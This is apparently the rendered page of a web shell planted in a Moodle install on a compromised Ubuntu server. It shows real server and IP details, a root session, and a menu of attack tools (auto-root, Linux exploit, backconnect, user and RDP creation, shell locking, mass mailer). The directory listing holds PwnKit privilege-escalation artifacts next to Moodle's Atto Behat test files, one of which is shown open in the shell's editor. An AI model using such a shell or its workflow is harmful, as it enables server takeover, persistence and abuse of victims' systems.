Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
editor /
atto /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
autosave.feature
4.04
KB
-rwxrwxrwx
behat_editor_atto.php
3.67
KB
-rwxrwxrwx
clean.feature
3.75
KB
-rwxrwxrwx
customtoolbar.feature
1.44
KB
-rwxrwxrwx
direction.feature
1.97
KB
-rwxrwxrwx
disablecontrol.feature
3.03
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customtoolbar.feature
@editor @editor_atto @atto Feature: Atto editor with customised toolbar In order to develop plugins that use Atto for specialised purposes As a developer I need to be able to configure Atto toolbar per-instance to include different plugins Background: # Get to the fixture page. Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "activities" exist: | activity | name | intro | course | idnumber | | label | L1 | <a href="../lib/editor/atto/tests/fixtures/custom_toolbar_example.php">FixtureLink</a> | C1 | label1 | When I log in as "admin" And I am on "Course 1" course homepage And I follow "FixtureLink" @javascript Scenario: Confirm that both editors have different toolbars but still function Then ".atto_link_button" "css_element" should exist in the ".normaldiv" "css_element" And ".atto_link_button" "css_element" should not exist in the ".specialdiv" "css_element" And ".atto_bold_button" "css_element" should exist in the ".normaldiv" "css_element" And ".atto_italic_button" "css_element" should exist in the ".normaldiv" "css_element" And ".atto_bold_button" "css_element" should exist in the ".specialdiv" "css_element" And ".atto_italic_button" "css_element" should exist in the ".specialdiv" "css_element"
Close